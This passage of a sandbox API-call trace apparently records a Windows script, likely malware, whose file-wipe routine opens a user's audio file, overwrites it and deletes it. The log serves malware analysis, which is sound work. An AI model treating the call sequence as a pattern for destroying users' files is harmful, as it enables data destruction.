returned 1 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.591] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.591] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.591] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.592] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.592] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.592] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.592] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.592] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.592] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.592] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.592] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.592] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.592] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.592] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.593] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0038.593] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.593] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.593] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0038.593] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.593] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.593] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.593] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.593] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.594] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.594] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0038.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0xdfd494b0, ftLastWriteTime.dwHighDateTime=0x1d5c564, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 0x7c2240 [0038.595] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.595] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.595] CharLowerBuffW (in: lpsz="byte[94620]", cchLength=0xb | out: lpsz="byte[94620]") returned 0xb [0038.595] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.595] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.595] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.595] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.595] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.595] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.596] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.596] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.596] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.597] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.597] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.597] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw-6csrf0kc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0038.598] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.598] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.598] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.598] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.598] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.598] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.599] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.599] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.599] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.599] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.599] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.599] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpFilePart=0x0) returned 0x33 [0038.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0x16b60e40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 0x7c2240 [0038.600] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw-6csrf0kc.wav")) returned 1 [0038.601] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861d3e90, ftCreationTime.dwHighDateTime=0x1d5c122, ftLastAccessTime.dwLowDateTime=0xdfd494b0, ftLastAccessTime.dwHighDateTime=0x1d5c564, ftLastWriteTime.dwLowDateTime=0x16b60e40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1719c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="vW-6Csrf0kc.wav", cAlternateFileName="VW-6CS~1.WAV")) returned 0 [0038.601] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.602] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.602] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.602] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.602] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.602] RtlAllocateHeap 